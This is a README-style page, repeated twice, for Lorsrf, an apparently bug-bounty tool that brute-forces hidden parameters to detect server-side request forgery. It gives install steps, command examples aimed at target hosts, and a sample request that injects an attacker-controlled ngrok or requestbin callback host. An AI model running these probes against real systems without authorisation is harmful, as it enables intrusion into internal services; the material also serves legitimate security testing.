Lorsrf - SSRF Parameter Bruteforce

Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST MethodsNOTELorsrf has been added to scant3r with useful additions (multi http method , multi content-type (json , query , xml , speed , large worlist and more)) https://github.com/knassar702/scant3r/wiki/lorsrf installdownload it ➜ git clone https://github.com/knassar702/lorsrf➜ cd lorsrf➜ sudo pip3 install requests flask install ngrok tool Steps :Ngrokrun your ngrok ./ngrok http 9090 run server.py script and add ngrok port python3 server.py 9090 run lorsrf.py and add ngrok host using -s option requestbin.comlogin to https://requestbin.com copy your host and add it by using -s option (without server.py file) How can i use it .?cat YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w wordlist.txt Examples :$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io add threads $ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --threads=50 add timeout $ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --timeout=4 add cookies $ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c 'user=5&PHPSESSION=5232' add headers from text file $ cat headers.txtCookie: test=1Auth: Basic TG9yU3JmCg==$ cat parameters.txt | python3 lorsrf.py -f headers.txt -s 'http://myhost.com' -t 'http://ssrf.hack.com'---------------------GET /?parameter={YOUR_HOST} HTTP/1.1Host: targer.comCookie: test=1Auth: Basic TG9yU3JmCg== Follow redirects $ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -r Testingpython3 lorsrf.py -t 'http://testphp.vulnweb.com/showimage.php' -s 'https://YOUR_HOST.com' -w parameters.txt Download Lorsrf

Lorsrf - SSRF Parameter Bruteforce

Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods


NOTE

install
  • download it
➜  git clone https://github.com/knassar702/lorsrf
➜ cd lorsrf
➜ sudo pip3 install requests flask

Steps :

Ngrok
  • run your ngrok ./ngrok http 9090
  • run server.py script and add ngrok port python3 server.py 9090
  • run lorsrf.py and add ngrok host using -s option

requestbin.com

How can i use it .?

cat YOUR_LIST.txt | python3 lorsrf.py -t URL_TARGET -s YOUR_HOST -w wordlist.txt


Examples :
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io
  • add threads
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --threads=50
  • add timeout
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io --timeout=4
  • add cookies
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -c 'user=5&PHPSESSION=5232'
$ cat headers.txt
Cookie: test=1
Auth: Basic TG9yU3JmCg==

$ cat parameters.txt | python3 lorsrf.py -f headers.txt -s 'http://myhost.com' -t 'http://ssrf.hack.com'

---------------------
GET /?parameter={YOUR_HOST} HTTP/1.1
Host: targer.com
Cookie: test=1
Auth: Basic TG9yU3JmCg==
  • Follow redirects
$ cat paramters.txt | python3 lorsrf.py -t http://target.com -s http://53252.ngrok.io -r

Testing
python3 lorsrf.py -t 'http://testphp.vulnweb.com/showimage.php' -s 'https://YOUR_HOST.com' -w parameters.txt